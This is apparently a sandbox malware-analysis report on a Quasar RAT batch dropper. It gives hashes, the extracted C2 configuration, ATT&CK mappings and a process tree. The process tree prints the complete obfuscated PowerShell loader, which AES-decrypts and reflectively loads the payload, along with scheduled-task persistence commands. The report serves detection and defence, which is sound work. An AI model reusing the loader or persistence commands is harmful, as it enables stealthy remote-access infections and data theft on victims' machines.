quasar | 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

General

Target

Uni.bat
Size

1.8MB
MD5

14516087f9549022d5582272910428b1
SHA1

53324370839fa1c07bfa42cf7cb3039513805d42
SHA256

745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512

cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
SSDEEP

24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

SLAVE

C2

uk2.localto.net:39077

Mutex

cc0a2b76-665e-4e16-b318-5ee02270fbcd

Attributes

encryption_key
D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
install_name
UpdateHost.exe
log_directory
Error Logs
reconnect_delay
3000
startup_key
WOS64
subdirectory
Windows

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2976-54-0x0000010AAC4D0000-0x0000010AAC7F4000-memory.dmp	family_quasar

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

Processes:

UpdateHost.exe

pid process

1868 UpdateHost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4300 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings powershell.exe

pid	process
1868	UpdateHost.exe

pid	process
4300	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exeUpdateHost.exe

pid	process
1096	powershell.exe
1096	powershell.exe
4512	powershell.exe
4512	powershell.exe
4512	powershell.exe
2976	powershell.exe
2976	powershell.exe
2976	powershell.exe
1868	UpdateHost.exe
1868	UpdateHost.exe
1868	UpdateHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeIncreaseQuotaPrivilege	4512	powershell.exe
Token: SeSecurityPrivilege	4512	powershell.exe
Token: SeTakeOwnershipPrivilege	4512	powershell.exe
Token: SeLoadDriverPrivilege	4512	powershell.exe
Token: SeSystemProfilePrivilege	4512	powershell.exe
Token: SeSystemtimePrivilege	4512	powershell.exe
Token: SeProfSingleProcessPrivilege	4512	powershell.exe
Token: SeIncBasePriorityPrivilege	4512	powershell.exe
Token: SeCreatePagefilePrivilege	4512	powershell.exe
Token: SeBackupPrivilege	4512	powershell.exe
Token: SeRestorePrivilege	4512	powershell.exe
Token: SeShutdownPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeSystemEnvironmentPrivilege	4512	powershell.exe
Token: SeRemoteShutdownPrivilege	4512	powershell.exe
Token: SeUndockPrivilege	4512	powershell.exe
Token: SeManageVolumePrivilege	4512	powershell.exe
Token: 33	4512	powershell.exe
Token: 34	4512	powershell.exe
Token: 35	4512	powershell.exe
Token: 36	4512	powershell.exe
Token: SeIncreaseQuotaPrivilege	4512	powershell.exe
Token: SeSecurityPrivilege	4512	powershell.exe
Token: SeTakeOwnershipPrivilege	4512	powershell.exe
Token: SeLoadDriverPrivilege	4512	powershell.exe
Token: SeSystemProfilePrivilege	4512	powershell.exe
Token: SeSystemtimePrivilege	4512	powershell.exe
Token: SeProfSingleProcessPrivilege	4512	powershell.exe
Token: SeIncBasePriorityPrivilege	4512	powershell.exe
Token: SeCreatePagefilePrivilege	4512	powershell.exe
Token: SeBackupPrivilege	4512	powershell.exe
Token: SeRestorePrivilege	4512	powershell.exe
Token: SeShutdownPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeSystemEnvironmentPrivilege	4512	powershell.exe
Token: SeRemoteShutdownPrivilege	4512	powershell.exe
Token: SeUndockPrivilege	4512	powershell.exe
Token: SeManageVolumePrivilege	4512	powershell.exe
Token: 33	4512	powershell.exe
Token: 34	4512	powershell.exe
Token: 35	4512	powershell.exe
Token: 36	4512	powershell.exe
Token: SeIncreaseQuotaPrivilege	4512	powershell.exe
Token: SeSecurityPrivilege	4512	powershell.exe
Token: SeTakeOwnershipPrivilege	4512	powershell.exe
Token: SeLoadDriverPrivilege	4512	powershell.exe
Token: SeSystemProfilePrivilege	4512	powershell.exe
Token: SeSystemtimePrivilege	4512	powershell.exe
Token: SeProfSingleProcessPrivilege	4512	powershell.exe
Token: SeIncBasePriorityPrivilege	4512	powershell.exe
Token: SeCreatePagefilePrivilege	4512	powershell.exe
Token: SeBackupPrivilege	4512	powershell.exe
Token: SeRestorePrivilege	4512	powershell.exe
Token: SeShutdownPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeSystemEnvironmentPrivilege	4512	powershell.exe
Token: SeRemoteShutdownPrivilege	4512	powershell.exe
Token: SeUndockPrivilege	4512	powershell.exe
Token: SeManageVolumePrivilege	4512	powershell.exe
Token: 33	4512	powershell.exe
Token: 34	4512	powershell.exe
Token: 35	4512	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 1892 wrote to memory of 1096	1892	cmd.exe	powershell.exe
PID 1892 wrote to memory of 1096	1892	cmd.exe	powershell.exe
PID 1096 wrote to memory of 4512	1096	powershell.exe	powershell.exe
PID 1096 wrote to memory of 4512	1096	powershell.exe	powershell.exe
PID 1096 wrote to memory of 3624	1096	powershell.exe	WScript.exe
PID 1096 wrote to memory of 3624	1096	powershell.exe	WScript.exe
PID 3624 wrote to memory of 1140	3624	WScript.exe	cmd.exe
PID 3624 wrote to memory of 1140	3624	WScript.exe	cmd.exe
PID 1140 wrote to memory of 2976	1140	cmd.exe	powershell.exe
PID 1140 wrote to memory of 2976	1140	cmd.exe	powershell.exe
PID 2976 wrote to memory of 4300	2976	powershell.exe	schtasks.exe
PID 2976 wrote to memory of 4300	2976	powershell.exe	schtasks.exe
PID 2976 wrote to memory of 1868	2976	powershell.exe	UpdateHost.exe
PID 2976 wrote to memory of 1868	2976	powershell.exe	UpdateHost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_590_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_590.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_590.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_590.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_590.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_590.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2976

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:4300

C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
"C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1868

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5753571cfc81f894ff82dc383591df11

SHA1
54dff38cbb912d61f7f2035f97d4dd75cb1a9f04

SHA256
c729a5004a163727dcc457585cd06d0ddee9c4a80327bd97383d08fd8ce413bf

SHA512
83483e2b4a2ffc2a7f7d38160d3e28f0fbeeac30563f57c8d5a6a9b32069a67ddddfb823c9ff1ae8fd057dfc53b8c8e43e58e0ca5907487b472e3152d21e1fb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m42l5o2g.4hc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_590.bat
Filesize
1.8MB

MD5
14516087f9549022d5582272910428b1

SHA1
53324370839fa1c07bfa42cf7cb3039513805d42

SHA256
745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

SHA512
cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_590.vbs
Filesize
115B

MD5
fc620f1ab5a3a971335dc5dcec6f7e3e

SHA1
2fe328d3fc49cef49dbade3a059325432e4433f3

SHA256
2d1813e296fafc65fef73a4ccfa3e48cbe553d1a54fc5334e6436644e29a6543

SHA512
f1e5598e04bed8789da16da4830a9a86c95db9081ed838a67a05f9423c87246ad9417c0a6b7d5ac0380aa11f4f0c7fd27ba48e1aba2766b878b941bd11bf2b74

Download Submit
memory/1096-42-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp

Filesize
10.8MB

Download
memory/1096-15-0x000001FD67480000-0x000001FD675D8000-memory.dmp

Filesize
1.3MB

Download
memory/1096-10-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp

Filesize
10.8MB

Download
memory/1096-14-0x000001FD67450000-0x000001FD67458000-memory.dmp

Filesize
32KB

Download
memory/1096-13-0x000001FD650F0000-0x000001FD65100000-memory.dmp

Filesize
64KB

Download
memory/1096-12-0x000001FD650F0000-0x000001FD65100000-memory.dmp

Filesize
64KB

Download
memory/1096-11-0x000001FD650F0000-0x000001FD65100000-memory.dmp

Filesize
64KB

Download
memory/1096-41-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp

Filesize
10.8MB

Download
memory/1096-5-0x000001FD671E0000-0x000001FD67202000-memory.dmp

Filesize
136KB

Download
memory/1868-72-0x000001D5C0C40000-0x000001D5C0CB6000-memory.dmp

Filesize
472KB

Download
memory/1868-71-0x000001D5BE760000-0x000001D5BE770000-memory.dmp

Filesize
64KB

Download
memory/1868-70-0x000001D5C09F0000-0x000001D5C0A34000-memory.dmp

Filesize
272KB

Download
memory/1868-60-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp

Filesize
10.8MB

Download
memory/2976-52-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp

Filesize
10.8MB

Download
memory/2976-54-0x0000010AAC4D0000-0x0000010AAC7F4000-memory.dmp

Filesize
3.1MB

Download
memory/4512-32-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp

Filesize
10.8MB

Download
memory/4512-29-0x000001F160490000-0x000001F1604A0000-memory.dmp

Filesize
64KB

Download
memory/4512-28-0x000001F160490000-0x000001F1604A0000-memory.dmp

Filesize
64KB

Download
memory/4512-18-0x000001F160490000-0x000001F1604A0000-memory.dmp

Filesize
64KB

Download
memory/4512-17-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads